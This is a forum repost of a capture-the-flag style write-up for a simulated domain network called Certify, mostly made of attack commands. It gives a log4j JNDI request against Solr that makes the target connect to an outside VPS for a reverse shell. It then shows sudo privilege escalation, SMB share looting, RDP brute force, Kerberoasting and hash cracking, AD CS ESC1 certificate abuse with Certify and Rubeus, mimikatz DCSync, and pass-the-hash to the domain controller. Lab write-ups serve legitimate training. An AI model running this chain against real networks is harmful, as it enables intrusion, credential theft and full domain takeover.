Jump to content

Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Certify Writeup

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Instructions

Certify is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and horizontal movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 4 flags in the shooting range, distributed in different target machines.

Technology

Solr, AD CS, SMB, Kerberos, Domain Penetration

First flag

log4j RCE

Scan the external network IP

1049983-20230307110517262-27201457.png Found that Solr has a log4j component, test whether there is rce

1049983-20230307110518011-2082945395.pngGET /solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn} HTTP/1.1

Host: 47.92.113.194:8983

Accept: application/json, text/plain, */*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36

X-Requested-With: XMLHttpRequest

Referer: http://47.92.113.194:8983/solr/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8

Connection: close 1049983-20230307110518750-1249723470.pngdnslog echo

1049983-20230307110519454-847276684.pngJNDI rebound shell, open on VPS

# Loading malicious classes

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 47.103.xxx.xxx

#Enable monitoring

nc -lvvp 5555 1049983-20230307110520161-1238749396.pngpayload

${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}Send a request

GET /solr/admin/cores?action=${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}wt=json HTTP/1.1

Host: 47.92.113.194:8983

Accept: application/json, text/plain, */*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36

X-Requested-With: XMLHttpRequest

Referer: http://47.92.113.194:8983/solr/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8

Connection: close successfully rebounds shell

1049983-20230307110520957-1838953280.pngsudo escalation of rights

sudo -l 1049983-20230307110521790-296300015.pngsudo grc --help 1049983-20230307110522600-1875494381.pngsudo grc --pty whoami 1049983-20230307110523204-310705807.png Find flag

sudo grc --pty find/-name flag* 1049983-20230307110523944-186127248.png output flag

sudo grc --pty cat /root/flag/flag01.txt 1049983-20230307110524763-1879119967.png

The second flag

Intranet penetration

Agent on the export machine and scan the intranet. I won't go into details (setting up http service, wget download npc and fscan)

172.22.9.13:445 open

172.22.9.26:445 open

172.22.9.47:445 open

172.22.9.7:445 open

172.22.9.26:139 open

172.22.9.47:139 open

172.22.9.7:139 open

172.22.9.26:135 open

172.22.9.13:139 open

172.22.9.13:135 open

172.22.9.7:135 open

172.22.9.26:80 open

172.22.9.47:80 open

172.22.9.19:80 open

172.22.9.47:22 open

172.22.9.47:21 open

172.22.9.19:22 open

172.22.9.7:88 open

172.22.9.19:8983 open

[+] NetInfo:

[*]172.22.9.13

[-]CA01

[-]172.22.9.13

[*] 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC

[*] 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO

[+] NetInfo:

[*]172.22.9.26

[-]DESKTOP-CBKTVMO

[-]172.22.9.26

[+] NetInfo:

[*]172.22.9.7

[-]XIAORANG-DC

[-]172.22.9.7

[*] 172.22.9.13 XIAORANG\CA01

[*] WebTitle:http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works

[*] WebTitle:http://172.22.9.19 code:200 len:612 title:Welcome to nginx!

[*] 172.22.9.47 WORKGROUP\FILESERVER Windows 6.1

[*] 172.22.9.47 (Windows 6.1)

[*] WebTitle:http://172.22.9.19:8983 code:302 len:0 title:None Jump url: http://172.22.9.19:8983/solr/

[*] WebTitle:http://172.22.9.26 code:200 len:703 title:IIS Windows Server

[*] WebTitle:http://172.22.9.19:8983/solr/code:200 len:16555 title:Solr Admin discovered the following assets

172.22.9.19 Entrance IP

172.22.9.7 DC

172.22.9.26 Domain Members

172.22.9.47 File Server

172.22.9.13 CA According to the prompt, the file server should have smb sharing to further collect information

Note: Fscan does not scan Smb's shared mode, so you can use nmap to scan

sudo grc --pty nmap -sT -A 172.22.9.47 1049983-20230307110525634-224058230.png Use smbclient to connect to share

proxychains smbclient \\\\172.22.9.47\\fileshare

dir

get personnel.db

get secret\flag02.txt 1049983-20230307110526730-874103981.png Get falg02, and there is another prompt you have enumerated smb. But do you know what an SPN is?

1049983-20230307110527663-561253035.png

The third flag

There are several user names and passwords in the database file

1049983-20230307110528608-1922222552.pngrdp crack

proxychains hydra -L user.txt -P pwd.txt 172.22.9.26 rdp -vV -e ns 1049983-20230307110529424-1574261648.png Obtained two accounts, but cannot log in remotely

Kerberost Attack

Use GetUserSPNs.py to find SPNs registered under domain users

proxychains python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian 1049983-20230307110530267-940825500.pnghash offline cracking, very fast, 1.txt is the hash value, rockyou.txt is the password book that comes with kali

hashcat64.exe -m 13100 1.txt rockyou.txt 1049983-20230307110531096-261013704.png Get zhangxia/MyPass2@@6, use the account password to log in remotely

Note that because it is a domain account, the user name is [email protected]. After logging in, you cannot directly access the administrator directory to find flags because it is not an administrator's permission.

1049983-20230307110531761-1694751780.png

ADCS ESC1

Use Certify.exe to locate vulnerabilities

Certify.exe find /vulnerable 1049983-20230307110532827-710567663.pngESC1 utilization prerequisites:

msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT

Indicates that users who apply for a new certificate based on this certificate template can apply for a certificate for other users, i.e. any user, including the domain administrator user

PkiExtendedKeyUsage: Client Authentication

Indicates that the certificate generated based on this certificate template can be used to authenticate computers in Active Directory

Enrollment Rights: NT Authority\Authenticated Users

Indicates that any authenticated user in Active Directory is allowed to request new certificates generated based on this certificate template

Apply for a certificate for the domain management

Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:'XR Manager' /altname:XIAORANG.LAB\Administrator 1049983-20230307110533809-973528015.png

Convert format

openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx request TGT, PTT

Because there is no password entered when exporting the certificate to convert, just leave the password blank here

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt 1049983-20230307110535013-1306229124.png Export the hash after obtaining the tickets from the domain manager

mimikatz.exe 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit 1049983-20230307110535889-669844448.png

Hash pass

PTH 172.22.9.26

proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt' 1049983-20230307110537190-621974043.png

The fourth flag

PTH DC

proxychains python3 wmiexec.py -hashes 0000000000000000000000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 [email protected] 1049983-20230307110538028-1871985575.png Original link: https://zhuanlan.zhihu.com/p/581487685

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.